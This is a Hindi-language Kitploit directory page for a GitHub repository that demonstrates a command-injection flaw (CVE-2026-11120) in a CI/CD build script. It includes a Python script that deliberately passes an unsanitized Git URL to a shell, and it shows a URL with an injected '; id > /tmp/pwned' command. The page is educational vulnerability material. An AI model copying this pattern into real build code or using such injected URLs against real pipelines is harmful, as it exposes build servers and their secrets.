Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline — CI/CD पाइपलाइनों में अनसैनिटाइज़्ड Git URL के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, जिसमें एक असुरक्षित बिल्ड स्क्रिप्ट और एक गंभीर CVE के लिए एक्सप्लॉइट उदाहरण शामिल है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline
भेद्यता विश्लेषणशोषणDevSecOpsलर्निंग और शिक्षा
GitHubgeorge0papasotiriou/cve-2026-11120-command-injection-via-git-url-in-ci-cd-pipeline

CVE-2026-11120-Command-Injection-via-Git-URL-in-CI-CD-Pipeline

CI/CD पाइपलाइनों में अनसैनिटाइज़्ड Git URL के माध्यम से कमांड इंजेक्शन प्रदर्शित करता है, जिसमें एक असुरक्षित बिल्ड स्क्रिप्ट और एक गंभीर CVE के लिए एक्सप्लॉइट उदाहरण शामिल है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-11120 – CI/CD पाइपलाइन में Git URL के माध्यम से कमांड इंजेक्शन

प्रोग्राम कोड (Python)

root@kitploit:~
# cicd_build.py - Clones repository without sanitizing URL
import subprocess, sys

def clone_and_build(repo_url):
    # Vulnerability: repo_url can contain shell metacharacters
    cmd = f"git clone {repo_url} /tmp/repo"
    subprocess.check_call(cmd, shell=True)
    # Build steps...

if __name__ == '__main__':
    # Simulate attacker-controlled input
    malicious_url = "https://github.com/org/repo.git; id > /tmp/pwned"
    clone_and_build(malicious_url)

CVE-2026-11120 – CI/CD में Git URL के माध्यम से कमांड इंजेक्शन

Severity: Critical

अवलोकन

एक CI/CD पाइपलाइन स्क्रिप्ट शेल कमांड में बिना सैनिटाइज़ किए उपयोगकर्ता-आपूर्ति किए गए Git रिपॉजिटरी URL का उपयोग करती है। एक हमलावर URL में विशेष वर्णों (जैसे ;, &&) को शामिल करके शेल कमांड इंजेक्ट कर सकता है, जिससे बिल्ड सर्वर पर मनमाना कमांड निष्पादन हो सकता है।

भेद्यता विवरण

  • प्रकार: कमांड इंजेक्शन
  • प्रभाव: बिल्ड इन्फ्रास्ट्रक्चर से छेड़छाड़, गोपनीय जानकारी का रिसाव।
  • मूल कारण: रिपॉजिटरी URL को बिना एस्केपिंग या सत्यापन के सीधे शेल कमांड में जोड़ दिया जाता है।

शोषण प्रदर्शन

कमजोर स्क्रिप्ट चलाएँ:

root@kitploit:~
python cicd_build.py

यह इंजेक्ट किए गए id कमांड को निष्पादित करता है, जिससे /tmp/pwned बनता है।

टूल डाउनलोड करें